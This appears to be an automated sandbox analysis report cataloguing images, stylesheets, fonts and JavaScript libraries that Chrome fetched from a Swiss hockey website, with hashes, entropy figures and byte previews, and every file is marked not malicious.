                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15818
                                                                                                                                            Entropy (8bit):7.957623617171629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AA3AB19E3B6680DE076967A85BEED8BA
                                                                                                                                            SHA1:7FE522456BD2F08148E78D08E61FCA1E8E8D615C
                                                                                                                                            SHA-256:A93A76652B33371EDDA90FEE866816082972B1E2C6DBE3E0AFCA0251B7F2F77F
                                                                                                                                            SHA-512:CFDC74A89C08D6C21CEC51A5D55611D571423D505B6FE245938C00708BF5140D8D62FDF30AD2C18FD7C32CDFB7D58734A8DE4248FC0F3F10D1D7AE1DD9B817A9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.............."..................................................................................N...?-.Z3.i.c4N.F`.A.fI...U\.S.Nc&N..&..2b.A...r.OX.Pz.D.S$.....9'.8..LK...3...g..N\..z<..[s.4.n./...s..I..!&..p..Y.K.&...he.-......;i6.Y.d....H.@..Y.T*...n..z...j...K..>c..st..3{o...]/Q...aF...b%.h.]r.....f.Q.F.b.{A.|....v.p.0l...!...Z.<I...W......T....4.9kF.E.....\.:.V=.90..v.#..MI.$../@.T.p..?.....2..4*.....R`>...I.."\.=.s...z....h.=.S...>_`...6..G.......l.kX|$....U.7U..5..-g..ZHt.5jb^G.q/V......T..E[A..n..6...0.G...w]...@..*....48.G.z...G.f..::..|.A#....S.......;.MD..K...,pzoM.............DRp6c..t...Yt.......w......}Sg....YGl},UB......l..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):75
                                                                                                                                            Entropy (8bit):4.08825077741154
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6AD991A3D5C1E5C5E51ECFF3D39CBD97
                                                                                                                                            SHA1:1E56E471B37265F7E89E3217B8B533F4E2ECF1A4
                                                                                                                                            SHA-256:B5BC211BFE287F428098A94DC8AA520A774A543062358617B972A20310E67847
                                                                                                                                            SHA-512:E6CDC6FCF23502CB166EE2AB3A897DAB7C5016C77B5FF6A9063802DCB023CCBC39FFD81B36A535E6149B8400E9F83879D2DE6787752F69E95576AC4ED492DBBF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:{"weather_temp":"winterlich","weather":"sonnig","weather_cluster":"sonnig"}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (54315)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55611
                                                                                                                                            Entropy (8bit):5.721182568927376
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4C10C6C9A3ABECD2C3AAB6E71EF762AF
                                                                                                                                            SHA1:DEF8FF04CC13D74B0FD5842853BB117544AD125A
                                                                                                                                            SHA-256:55BC3EA08783F1085F62DADE93D3893206E31F85C644178A358C340CA88C52D7
                                                                                                                                            SHA-512:91FBF1EDAE4D4002EB9CCFD8EBFB6F1BD31C4A1F187A0EE0796224320760D88FEAE541AA1862F427FB452B930E0338E79FB3063B55EEC81179FA1994F9E82156
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function m(Q){return Q}var K=function(Q){return m.call(this,Q)},A=this||self,U=function(Q,n,N,e,M,c,r,B,h,C,z,b){for(b=(z=28,Q);;)try{if(z==48)break;else if(z==n)z=B&&B.createPolicy?26:7;else if(z==63)b=Q,z=e;else if(z==26)b=29,h=B.createPolicy(c,{createHTML:K,createScript:K,createScriptURL:K}),z=N;else{if(z==7)return h;if(z==e)z=A.console?4:N;else if(z==28)B=A.trustedTypes,h=r,z=n;else{if(z==N)return b=Q,h;z==4&&(A.console[M](C.message),z=N)}}}catch(Y){if(b==Q)throw Y;b==29&&(C=Y,z=63)}};(0,eval)(function(Q,n){return(n=U(82,5,12,49,"error","bg",null))&&Q.eval(n.createScript("1"))===1?function(N){return n.createScript(N)}:function(N){return""+N}}(A)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;c
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3494
                                                                                                                                            Entropy (8bit):7.850886557765074
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4003FF636342569977E4AED6FC935A79
                                                                                                                                            SHA1:169D6FEF64CA84CF7B67FE33B2854C72A797213A
                                                                                                                                            SHA-256:8CE0BD0FF3B6C0EB84A63F3D5A5761815E77CD5ED3F23F38ED575F7ED737982D
                                                                                                                                            SHA-512:B156CB42EB8CB03216D8DEB58B7631D30A95ED2F075DD4F818CE038E29EA0A3629E241809B2E8265B0166CDB23C4A933BCE1F8C35E3E132C814F1D1DC5DF7820
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_7350.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ....02...*..Z.>.@.H..."-.M....c...`-......o]O;M.m.+Ln*....)....1}zjA.^2w..#Q.d..A..}......?.<F.>......6=3....._.^f>......z.q.*...OF.@g:.d...L4..c..Tc..x.......d.<.)......O......}...q.F.B.(.G....m.3-L%..c.4q-.y3......>Z>A.......N.......(m..!....4..L._.../...NB9....=....N%........ .7..q...O....ZMT...{^-..J.&.Y.....;...6M...&....2.Z}S...>.c.K..=....9."..>xh2......&.%......xD....i...;......6..FH....{...i.[.......pm...OY.u.{{b... ..\..#.....{..{M.....d..J.}..|+......1..^.........e..9.!...X.%..Li. ..~Ld|]kb0.C...L..3.w.e.....pe[...{....`gG ....U..$I$.i.u.....%....\.5W`......o...........\T7.V.........ZLV..]...`.....>-...D...Tf...$..u.hX..v.(o..b+....!....n..F1.....w..]...+l4{...p..3.Y.GBSN}.a...Y.#..z)...=..Ss......Qz$..DI..q...t..&.....e/1......dQg][.O}.|M._...F4>._...7.z....v.nZ..H..V...pfk<p.;m......O...,...... .g.,i.......,?...W.2%....k.....f..(4g..u4..c...VL2..Z..?..=.Y.=e.o.|O.....S....4zp#...b....8+.@.9.3. "
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (29479), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):29479
                                                                                                                                            Entropy (8bit):4.77901806674124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5B398A6C04AB58F9ED985C2C1DFCFE91
                                                                                                                                            SHA1:EE55D7B8C198DEACFF0C6FDFDFE5E7C5453A1995
                                                                                                                                            SHA-256:72F7157CC25728E2A403BD36F467D1C85D5108ACC5228C71769D723F0160E6C6
                                                                                                                                            SHA-512:91899D0B5CA0CED2A0B903BCE715B43D02638DC7ADD454B2502B3A30DBFEEB8AA1D4C44F6A7ADA5F07F2A07AF91ABB3F9355AAF24C37CE7F87D4194FC3AD5069
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/inc/compatibility/elementor/assets/css/elementor.min.css?ver=4.1.12
                                                                                                                                            Preview:*{-webkit-box-sizing:border-box;box-sizing:border-box}.elementor-column-gap-default .elementor-row{width:calc(100% + 20px);margin-left:-10px;margin-right:-10px}.elementor-column-gap-narrow .elementor-row{width:calc(100% + 10px);margin-left:-5px;margin-right:-5px}.elementor-column-gap-extended .elementor-row{width:calc(100% + 30px);margin-left:-15px;margin-right:-15px}.elementor-column-gap-wide .elementor-row{width:calc(100% + 40px);margin-left:-20px;margin-right:-20px}.elementor-column-gap-wider .elementor-row{width:calc(100% + 60px);margin-left:-30px;margin-right:-30px}.elementor-page .cm-entry-header h2.cm-entry-title{display:none}.tg-container{margin-right:auto;margin-left:auto;padding-left:15px;padding-right:15px}.tg-row{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-left:-15px;margin-right:-15px}.tg-row .tg-col-control{padding-right:15px;padding-left:15px}.tg-row.thinner{margin-left:-2px;margin-right:-2px}.tg-row.thinner .tg-col-contr
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (27374), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):27598
                                                                                                                                            Entropy (8bit):4.838752641200235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0B93C1EC0F8CC7AE060F7A153695FAFB
                                                                                                                                            SHA1:B3D355170D8F9971CF832F5F58E33613BC48F94B
                                                                                                                                            SHA-256:090254EA9A470D62F5491024EDA282C1B49AC075C2B169991FD26E075ECEE649
                                                                                                                                            SHA-512:56A9DBDD2545AC53DAFD02B53C914E9CB2F3174D664B9FAAA79AF52DF8DDEF02CE62464945169725DA99126BFE0D99E4897B4F50DE8B957862F9183AF7F9317E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/library/font-awesome/css/v4-shims.min.css?ver=6.5.2
                                                                                                                                            Preview:/*!.. * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License).. * Copyright 2024 Fonticons, Inc... */...fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22727
                                                                                                                                            Entropy (8bit):7.968447929468425
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3DC346C2B738123A23DEEC71F98F9FE9
                                                                                                                                            SHA1:546C255AA67554A448AF7B9D8DE27B41FECD85EC
                                                                                                                                            SHA-256:46F285846BD08E32CEF56109B05285E4F14D440746DFEDCE0B29B03544D55770
                                                                                                                                            SHA-512:3FACEC2E557E946A07DA54103AD79748C54EF52EF2F00BBF133D76FC524DA9868603B4304AF6A8875434A7ED89D79BC85F8C0FAC35EAF44125CC085D67437745
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"......................................................................................).8.Us.......S:.{z..wXm..........f.5...P....K..f..q,*.Z....D..:..'w....p..:.......6n.47.c.[.n^..f..5:,..T@.."......It....2.b..O.i...k.P.....S.....a...[.&.bM..c6.X....mG......O5..n......9{.E.M.....~.........k....4..$.>..n......563.&3*.i.zvS.f$...q.X..D).E...'.<\.........m.@w.5z[.....`.Z.OC"..Q..!..ZJ}.d..,..L..j.Mm,..`:%.l.&.Rn-..i.;.K..3......_d"s]..g.\..Z.N.........k.2........T.1.X..;.}..D.U.u.X,../.....[..A..P_..Dw%.%....%..H...8..(...l2...v..-7...D.p..iP....o..<......N..;-UM$.^.Ws.....\@...&'>..A...9.1f..s..5..FTt......N
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65037)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):125454
                                                                                                                                            Entropy (8bit):5.277372866440939
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D0589749904C1AF3F9128BF7AFE553E9
                                                                                                                                            SHA1:8DD712299C983CCD1EA08784446C9C4FF733FDB0
                                                                                                                                            SHA-256:561965ECA927D8693F59BAD28BFEE534B6D0444D8F23E340D898D03260071898
                                                                                                                                            SHA-512:F932E568EA9C6731D0C0DE99AE60215A307ACB130114464D026D75B7D6E573B563BC1D0158922C8A7335BC73AA3009AC8ACD298AE710C843EA4E8FD559CCAFC4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/vendor/datatables/datatables.min.js?ver=0.13.6
                                                                                                                                            Preview:/*. * This combined file was created by the DataTables downloader builder:. * https://datatables.net/download. *. * To rebuild or modify this file with the latest versions of the included. * software please visit:. * https://datatables.net/download/#dt/dt-1.13.2/b-2.3.4/b-colvis-2.3.4/fc-4.2.1. *. * Included libraries:. * DataTables 1.13.2, Buttons 2.3.4, Column visibility 2.3.4, FixedColumns 4.2.1. */../*! DataTables 1.13.2. * .2008-2023 SpryMedia Ltd - datatables.net/license. */.!function(n){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(t){return n(t,window,document)}):"object"==typeof exports?module.exports=function(t,e){return t=t||window,e=e||("undefined"!=typeof window?require("jquery"):require("jquery")(t)),n(e,t,t.document)}:window.DataTable=n(jQuery,window,document)}(function(P,j,y,N){"use strict";function d(t){var e=parseInt(t,10);return!isNaN(e)&&isFinite(t)?e:null}function l(t,e,n){var a=typeof t,r="string"==a;return"number"==a||"bigin
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C++ source, ASCII text, with very long lines (2015)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39721
                                                                                                                                            Entropy (8bit):5.520819597918305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6E12BE9BB6504B5BCBB481E3B876DC8B
                                                                                                                                            SHA1:F18229C868C4121E02D8B3C290CD2277E349298F
                                                                                                                                            SHA-256:D7C20C2B327BEE958FACE07053E725F50D9F084127A77374EAF091B50CF2B98B
                                                                                                                                            SHA-512:C0BBA4D6D9C57874A14C80EB99341B182F96CB2F4E12083CE915EB2F908AFF8E00AF037631A6BEF66C5712A6D63B175955BBBADF593297527B3523129D0B5323
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};const ba=(new Date("2024-01-01T00:00:00Z")).getTime();function ca(a,b){switch(a){case 0:return b?"&ri=1":"";case 1:return b?"&ri=24":"&ri=27";case 2:return b?"&ri=25":"&ri=26";default:return""}}function q(a,b){return b?a.g?a.h.slice(0,a.g.index)+b+a.h.slice(a.g.index):a.h+b:a.h}.function da(a){a=a.A;if(!a)return"";let b="";a.platform&&(b+="&uap="+encodeURIComponent(a.platform));a.platformVersion&&(b+="&uapv="+encodeURIComponent(a.platformVersion));a.uaFullVersion&&(b+="&uafv="+encodeURIComponent(a.uaFullVersion));a.architecture&&(b+="&uaa="+encodeURIComponent(a.architecture));a.model&&(b+="&uam="+encodeURIComponent(a.model));a.bitness&&(b+="&uab="+encodeURIComponent(a.bitness));a.fullVersionList&&(b+="&uafvl="+encodeURIComponent(a.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3089
                                                                                                                                            Entropy (8bit):7.699222670743964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7B7870DF5C8C8AD1C24B48DDAE5A4A13
                                                                                                                                            SHA1:0B579E0D08440E4249623632C2D5DEC8BC1C6452
                                                                                                                                            SHA-256:ACF647E7B164497F362AD68CA922145FF2B3161F397E98D06AE8687BB2B78F89
                                                                                                                                            SHA-512:E4D33B4F8A68176F4F7F4692926B19BC45632C4DBB725E4E89941D71DB709C326EAB92895F078C502905BC47B513669A7FD1D152865C0F847ED87B5337762EA2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr......C.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........Z...."...................................................................................~.....\L..S.e.Lpqm....e....f....p....u.K/...k F..MBS..6.V.<...pk=.>.C.lW9.Ali.,)>..].r.....y.s.....c.......M..........tmpzM.......m.....`.Y.V.1...y.8.&.D.!]". b$.{.../..T.@Mz.Yg^..w..C.7...<a.rb..'P..... 03.Q ......8.CC......@..........................!.1Q."Aq.#a.... 2s.....$RUb..&6CDS..........?./.v.\w5k<.1.X..A...X..v...g_...z.dq.'k.\`.^..4<.o......W..[..s..u@F..Y......d.;..}++.3.=.q4ki.!.C...K.h..~.P..G].?..>....6...Z.?..?V.CFb<...v|...JK........X..%f.'.E;....f..>,...n.....Z...]T....h.8......b..K.}.<Ky6.(...r.j..O.!...6..'.....B:.&....<..+o.j
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):48236
                                                                                                                                            Entropy (8bit):7.994912604882335
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                                            SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                                            SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                                            SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                                            Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):6824
                                                                                                                                            Entropy (8bit):7.938660632527776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5A7DF1AECFE7B57F9F621DDC1E67C73E
                                                                                                                                            SHA1:466D58FD18550CAF0B916E1257E683ABF1F5B888
                                                                                                                                            SHA-256:EAF2F9BA3F5B332E467E78534E58BF29D3B5F7F200D64915B76E1D5D4336DFD6
                                                                                                                                            SHA-512:FE98C0627C1CFB601498B7CDEBB386CD8FBF0DC5B812925CDC042ADC95D6682996896673EB68883DA0B9AA3766FD7B53D5FF66C67B646E7E95BE37BDAFF7E633
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:auto/h:auto/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/10/fond-footer-1.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X........P..|..VP8 ........*Q.}.>.F.K....&s....ihj..{.....?....?........P7.....5v>./.'._......?.?....w.g..x......g...C.{......}.....r}..u.......V<...t6..R.. ..b...S...&.U.^..O..Z..<Ko. 2.\...9J2V.!!b...;.@.......o...a.t..E.:Z...S33.N..9.d.Z.?..f...2.4.....Q..\.~.A........]j.z..[g..4B..[.o*..T,#........+A....>{p*..h.3....sg..w..5....?....YD.....n...RU.7J+....4..q.......\w).?$.O..Y.6..A].soM.w..je}Sv....u.w..X.CB..F.xj.:.f.f..G......a.._....j....8F8....?...........Ak....z...*..+.5(Ut..V...g.n.e..,PJZ....J.:...Vb)..?...M.....6..d..}......d8]` .?n.+.Nm.q..:vZJ.&.o.b....t ...9.-..-......Pf.T.<O..\2.K.mg..\.p...R...*... *c...B...E..O...N.!.}..~.H.R4"..3b@..t..v.!.uu......:......_.1... .F..@.+ur..GR.......i.o.."..6..J...e...n...(O.P^.P...Xg..;.kV2%..K>...@sv/S...O.Wp.#....(.i;t.o;...Z.zh...i.a.......oH.......h4.......r...r..:]7`.r4....0.G. ...U.}....7QSw..].........{.m.+..1..~........'G.|<Z......R&........z...Y/}..KT'.3.6RZR./..{./9....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4866)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4905
                                                                                                                                            Entropy (8bit):5.382035509921017
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:32A55DBCCDBC04945AFBEB33247E0EE4
                                                                                                                                            SHA1:30F853D4D5EAA52C0DD5FD2C4ADD9BD7D4D20ADB
                                                                                                                                            SHA-256:75479495809D50623A1761B699F6B83B18E42B656E7ADC111B69FADFD893EA40
                                                                                                                                            SHA-512:1C68D11D6B9CB2D303219E2CC198CC39675B60D54800AF7B0B65A3E05E8159547943910CCE90B27A69E38B11CEA88753B1B89F0FEF6DE559038FC7594C5DE241
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (30583)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):624161
                                                                                                                                            Entropy (8bit):4.867671323403569
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9DEF9FD72E0ECDCA4ED079A00341429F
                                                                                                                                            SHA1:1EA7FFA01EF835746EC39350C70D38C254B99220
                                                                                                                                            SHA-256:A5206D77B9A2B9B01131ECC18181CCE1FF3AC233CBB7257EDDE2507C60335ABC
                                                                                                                                            SHA-512:FA4F04ECC3D2AFBA6555EEFA86BC37D449E38B0BBC3F822AD08648AE7774A3DE33E8D297A0EB6EE29E4CDD4E622A31EB0184921402D107AB4632F0EEB180C8B2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/blockspare/dist/style-blocks.css?ver=6.7.1
                                                                                                                                            Preview:figure.blockspare-posts-block-post-img{margin:0}.blockspare-posts-block-latest-post-carousel-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-grid-header,.blockspare-posts-block-latest-post-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-grid-header,.blockspare-posts-block-latest-post-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-content{display:flex;flex-direction:column}.blockspare-posts-block-latest-post-carousel-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-content .blockspare-posts-block-post-grid-title,.blockspare-posts-block-latest-post-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-content .blockspare-posts-block-post-grid-title{display:flex}.blockspare-posts-block-latest-post-carousel-wrap .blockspare-posts-block-post-single .blockspare-posts-block-post-content .blockspare-posts-block-post-grid-title a,.blockspare-posts-block-latest-post-wrap .blockspare-posts-bloc
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):173445
                                                                                                                                            Entropy (8bit):5.032269564343417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:536894559C4DAF178615D725E7103C32
                                                                                                                                            SHA1:127C10E635CA63777172032B5592E87B273FC63B
                                                                                                                                            SHA-256:2CB68B8F7D1956A37275DF8EE9652E077419574C16D58E037CB3A9D31747FA6C
                                                                                                                                            SHA-512:E81DEE359C8AFC31152BDBD56064B360363CF2406D899418660644343CC3DE4FF7FFC74B783E95D941913F421A191ECDD1E5DA30466D261EDCF3B56018E8E373
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/public/css/styles.min.css?ver=0.13.6
                                                                                                                                            Preview:.editor-styles-wrapper .dummy-class{font-size:1rem}.d-none{display:none!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}@media (min-width:576px){.d-sm-none{display:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}}@media (min-width:768px){.d-md-none{display:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-table{display:table!important
